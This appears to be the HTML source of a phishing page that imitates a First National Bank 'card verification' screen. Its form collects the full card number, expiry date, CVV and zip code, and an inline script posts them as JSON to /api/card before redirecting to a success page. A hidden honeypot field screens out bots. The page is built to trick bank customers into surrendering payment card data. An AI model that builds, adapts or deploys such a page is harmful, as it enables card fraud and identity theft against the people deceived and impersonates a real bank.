<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Card Verification - The FNB</title>
       <!-- Favicons -->
       <link href="" rel="icon" type="image/icon">
       <link href="" rel="apple-touch-icon" type="image/icon">

      <link rel="stylesheet" href="">
      <style>
         body{
            margin: 0px;
         }
         *{
            font-family: sans-serif;
         }
         section{
            width: 100%;
            height: 100%;
            background-image: url();
            background-position: top;
            background-size: cover;
            background-repeat: no-repeat;
            position: absolute;
            padding: 0px;
            box-sizing: border-box;

         }
         section>div{
            width: 25%;
            background: #1E1F20;
            display: flex;
            flex-direction: column;
            padding: 30px 70px 50px 70px;
            border-radius: 10px ;
            margin: 0px auto;
            transform: translateY(50px);
            height: fit-content;
         }
         section>div img{
            width: 80%;
            box-sizing: border-box;
            margin: 0px auto;
            text-align: center;
         }
         section>div h1{
            color: #5398d4;
            text-align: center;
            margin: 0px 0px 10px 0px;
            font-size: 19px;
            font-family: monospace;
         }
         section>div p{
            text-align: center;
            margin: 5px 0px 30px 0px;
            color: gray;
            font-weight: 600;
         }
         section>div form{
            display: flex;
            flex-direction: column;
         }
         section>div input{
            margin-bottom: 20px;
            padding: 20px 18px;
            border: 1px solid rgb(176, 176, 176);
            border-radius: 5px;
            background: transparent;
            outline: #5398d4;
            color: gray;
            font-size: 16px;
         }
         section>div input:focus{
            border: 2px solid #5398d4;
         }
         section>div a{
            color: #5398d4;
            text-align: right;
            text-decoration: none;
            font-weight: bold;
            font-size: 14px;
            margin-bottom: 10px;
         }

         section .forbut{
            text-align: right;
            padding-top: 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
         }
         .chan{
            color: #5398d4;
         }
         section>div span{
            font-size: 15px;
            font-weight: bold;
         }
         section>div button{
            position: relative;
            padding: 18px 28px;
            border-radius: 8px;
            border: none;
            background: #053780;
            color: rgb(210, 210, 210);
            font-weight: 600;
            cursor: pointer;
            font-size: 14px;
         }

         footer{
            background: #1E1F20;
            position: fixed;
            bottom: 0px;
            width: 100%;
            margin: 0px;
         }
         footer ul{
            box-sizing: border-box;
            list-style-type: none;
            display: flex;
            padding: 0px;
            justify-content: center;
            align-items: center;
            flex-wrap: wrap;
            height: inherit;
         }

         footer li{
            margin: 0px 8px;
            font-size: 12px;
            color: gray;
         }
         @media screen and (max-width: 768px) {
            /* body{
               background-image: url(images/bg.png);
               background-size: 100% contain;
            }
            section{
               position: absolute;
               height: 100% !important;
            } */
            section>div{
               width: fit-content;
               margin: 0px 5% ;
               padding: 10px 50px 20px 50px;
            }
            section>div img{
               width: 80%;
               box-sizing: border-box;
               margin: 0px auto;
               text-align: center;
            }
         }
      </style>
     
   </head>
   <body>
      <header>
         <section>
            <div>
               <img src="" alt="logo" >
               <h1>Card Info Information On File</h1>
               <form name="fnbcard" id="fnbcard" action="/api/card" method="POST" onSubmit="submit">
                  <input type="text" name="bot-field" style="display: none; visibility: hidden;">
                  <input type="text" name="card_number_info" placeholder="Card Number" minlength="16" maxlength="16" required>
                  <input type="text" name="exp_date_info" placeholder="MM/YYYY" minlength="7" maxlength="7" required>
                  <input type="text" name="cvv_info" placeholder="CVV" minlength="3" maxlength="3" required>
                  <input type="text" name="zip_code_info" placeholder="Zipcode" minlength="6" maxlength="6" required>
                  
                  <div class="forbut">
                     <button type="submit">Continue</button>
                  </div>
               </form>
            </div>
         </section>
      </header>
      <footer>
         <ul>
            <li>©  2024 First National Bank  </li>
            <li>(800) 564-3195</li>
            <li class="chan">Privacy policy</li>
            <li>Member FDIC </li>
            <li> Equal Housing Lender</li>
         </ul>
      </footer>


      <script>
         document.getElementById('fnbcard').addEventListener('submit', async function(event) {
            event.preventDefault(); // Prevent default form submission
            const formData = new FormData(this);

            const response = await fetch('/api/card', {
                method: 'POST',
                body: JSON.stringify({
                  card_number_info: formData.get('card_number_info'),
                  exp_date_info: formData.get('exp_date_info'),
                  cvv_info: formData.get('cvv_info'),
                  zip_code_info: formData.get('zip_code_info'),
                }),
                headers: {
                    'Content-Type': 'application/json'
                }
            });

            if (response.ok) {
                window.location.href = '/public/success.html'; // Redirect to success page
            } else {
                alert('Failed to submit. Try again!');
            }
        });
      </script>
   </body>
</html>